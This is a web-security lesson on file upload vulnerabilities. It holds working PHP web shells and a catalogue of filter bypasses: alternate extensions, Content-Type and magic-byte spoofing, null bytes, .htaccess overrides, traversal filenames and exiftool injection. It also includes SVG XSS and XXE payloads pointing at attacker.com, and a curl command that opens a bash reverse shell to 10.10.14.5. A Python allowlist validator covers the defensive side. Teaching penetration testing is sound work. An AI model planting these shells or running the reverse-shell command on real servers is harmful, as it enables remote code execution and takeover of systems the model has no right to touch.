Web Application Attacks
File Upload Vulnerabilities
File upload functions can lead to remote code execution if improperly secured. This lesson covers common upload bypasses.
Understanding File Upload Attacks
When applications allow file uploads without proper validation, attackers can:
Attack Vectors:
├── Upload web shells (PHP, JSP, ASP)
├── Overwrite configuration files
├── Upload malicious executables
└── Store malware for distribution
Basic Web Shell Uploads
Simple PHP Shell
<?php system($_GET['cmd']); ?>
Save as shell.php and upload. Access via:
http://target.com/uploads/shell.php?cmd=whoami
More Functional PHP Shell
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Bypassing Upload Filters
Extension Blacklist Bypass
Try alternative extensions:
PHP:
.php3, .php4, .php5, .php7
.phtml, .phps, .pht, .phar
.PHP (case variation)
.php.jpg (double extension)
ASP:
.asp, .aspx
.asa, .cer, .cdx
.ashx, .asmx
JSP:
.jsp, .jspx
.jsw, .jsv, .jspf
Content-Type Bypass
Modify the Content-Type header of the file part (inside the multipart body, not the request's top-level header) in Burp Suite:
Original: Content-Type: application/x-php
Modified: Content-Type: image/jpeg
Original: Content-Type: text/php
Modified: Content-Type: image/png
Magic Bytes Bypass
Add valid image headers before PHP code:
GIF:
GIF89a
<?php system($_GET['cmd']); ?>
PNG (hex):
\x89PNG\r\n\x1a\n
<?php system($_GET['cmd']); ?>
JPEG:
\xFF\xD8\xFF\xE0
<?php system($_GET['cmd']); ?>
Null Byte Bypass (PHP before 5.3.4)
shell.php%00.jpg
shell.php\x00.jpg
The filename passes an extension check as .jpg, but the C-level file functions stop at the NUL and write shell.php. PHP 5.3.4 started rejecting paths containing NUL, so this only works on very old deployments.
Double Extension
shell.php.jpg
shell.jpg.php
shell.php.png
shell.php%00.png
.htaccess Upload
If the target runs Apache with mod_php and AllowOverride permits FileInfo in the upload directory, an uploaded .htaccess can make Apache execute another extension as PHP:
# .htaccess content
AddType application/x-httpd-php .jpg
Then upload shell.jpg containing PHP code to the same directory. The directive applies only to that directory and below, and does nothing on nginx, which never reads .htaccess.
Path Traversal in Filename
Try to upload outside the intended directory:
filename="../shell.php"
filename="../../var/www/html/shell.php"
filename="..\..\..\inetpub\wwwroot\shell.aspx"
Image Embedding
Exiftool Injection
# Inject PHP into image metadata
exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
# Rename so the server treats it as PHP (e.g. .php.jpg where Apache's AddHandler matches any .php segment, or .phtml)
mv image.jpg shell.php.jpg
Using GIF
# Create minimal GIF with PHP
echo -e 'GIF89a;\n<?php system($_GET["cmd"]); ?>' > shell.gif.php
SVG File Upload
SVG files are XML, so an SVG served back inline as image/svg+xml gives stored XSS, and one parsed server-side (thumbnailing, sanitising) may trigger XXE:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg onload="alert('XSS')" xmlns="http://www.w3.org/2000/svg">
<defs>
<font id="x"><font-face font-family="exploit"/></font>
</defs>
</svg>
For XXE, which the server-side parser turns into SSRF if it resolves external entities:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "http://attacker.com/"> ]>
<svg>&xxe;</svg>
Testing Methodology
Step 1: Understand the Upload Function
Questions to answer:
├── What file types are allowed?
├── Where are files stored?
├── Can you access uploaded files directly?
├── What naming convention is used?
└── Are there size restrictions?
Step 2: Test Basic Upload
# Simple PHP shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
# Try to upload and access
Step 3: Try Bypasses
1. Extension variations
2. Content-Type manipulation
3. Magic bytes
4. Double extensions
5. Null bytes
6. Case variations
Step 4: Find Upload Location
# Common locations
/uploads/
/images/
/files/
/media/
/attachments/
/user_uploads/
Bypass Cheat Sheet
| Bypass Type | Technique |
|---|---|
| Extension blacklist | .phtml, .php5, .phar |
| Content-Type | Change to image/jpeg |
| Magic bytes | Add GIF89a prefix |
| Double extension | shell.php.jpg |
| Null byte | shell.php%00.jpg |
| Case bypass | shell.PHP, shell.Php |
| .htaccess | Allow .jpg as PHP |
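As the defensive counterpart to the cheat sheet, here is an allowlist validator, added as an example and not taken from the lesson or from any particular framework, that rejects every row of the table: the client's extension and Content-Type are not trusted, only the last extension is examined after lower-casing, the content must begin with a known image signature that matches that extension, and the stored name is random, so double extensions and traversal never reach the disk. The 5 MB cap and the PHP open-tag scan are assumptions; the scan is defence in depth only, because a polyglot can hide code past a valid header, so production code should additionally re-encode the image and store uploads outside the web root.

```python
"""Allowlist validation for an image upload. Added example, not from the lesson."""
import secrets
import re
from typing import Dict, Optional, Tuple

# Signatures we accept, and the extension the stored file gets. The client's
# filename extension and Content-Type header are never used for this decision.
MAGIC_TO_EXT = (
    (b"\xff\xd8\xff", "jpg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
)
ALLOWED_EXTS = {"jpg": "jpg", "jpeg": "jpg", "png": "png", "gif": "gif"}
MAX_BYTES = 5 * 1024 * 1024           # assumed size cap
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)  # defence in depth only


def sniff(data: bytes) -> Optional[str]:
    """Return the image type from the leading bytes, or None if unrecognised."""
    for magic, ext in MAGIC_TO_EXT:
        if data.startswith(magic):
            return ext
    return None


def check_upload(client_filename: str, data: bytes) -> Tuple[bool, str, Optional[str]]:
    """Return (accepted, reason, stored_name); stored_name never derives from the client name."""
    if "\x00" in client_filename:                      # shell.php\x00.jpg
        return False, "null byte in filename", None
    if "/" in client_filename or "\\" in client_filename:  # ../shell.php
        return False, "path separator in filename", None
    if len(data) > MAX_BYTES:
        return False, "file too large", None
    # Lower-case, LAST extension only: shell.jpg.php -> php, shell.PHP -> php,
    # .htaccess -> empty base, all rejected by the allowlist below.
    base, dot, ext = client_filename.lower().rpartition(".")
    if not dot or not base or ext not in ALLOWED_EXTS:
        return False, "extension not in allowlist: %r" % ext, None
    sniffed = sniff(data)                              # ignore the client's Content-Type
    if sniffed is None:
        return False, "content is not a supported image", None
    if sniffed != ALLOWED_EXTS[ext]:                   # shell.php.jpg carrying GIF89a
        return False, "extension %s does not match content %s" % (ext, sniffed), None
    if PHP_TAG.search(data):                           # GIF89a + <?php polyglot
        return False, "PHP open tag inside image data", None
    return True, "ok", "%s.%s" % (secrets.token_hex(16), sniffed)


def response_headers(stored_name: str) -> Dict[str, str]:
    """Headers for serving a stored upload: type fixed from the sniffed extension."""
    ext = stored_name.rpartition(".")[2]
    mime = {"jpg": "image/jpeg", "png": "image/png", "gif": "image/gif"}[ext]
    return {
        "Content-Type": mime,
        "X-Content-Type-Options": "nosniff",           # browser must not re-sniff as HTML/SVG
        "Content-Disposition": 'attachment; filename="%s"' % stored_name,
    }
```

`response_headers` fixes the Content-Type from the stored extension, adds `nosniff` and forces a download, so even a file that slipped through is never rendered as HTML or SVG in the application's origin; keeping the upload directory free of any script handler (or outside the web root entirely) is what makes the .htaccess and double-extension rows irrelevant.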
Post-Upload Actions
After successful upload:
# Access the shell
curl "http://target.com/uploads/shell.php?cmd=id"
# Get reverse shell (listener first: nc -lvnp 4444 on the attacker host, 10.10.14.5 here)
curl "http://target.com/uploads/shell.php?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.5/4444+0>%261'"
File Upload Testing Workflow
1. Identify upload functionality
2. Upload normal file, note location
3. Try PHP shell with .php extension
4. If blocked, try extension bypasses
5. Try Content-Type manipulation
6. Try magic byte injection
7. Try double extensions
8. Check for .htaccess upload
9. Try path traversal in filename
10. Access uploaded shell
With web attacks covered, we'll move to post-exploitation and privilege escalation in the next module.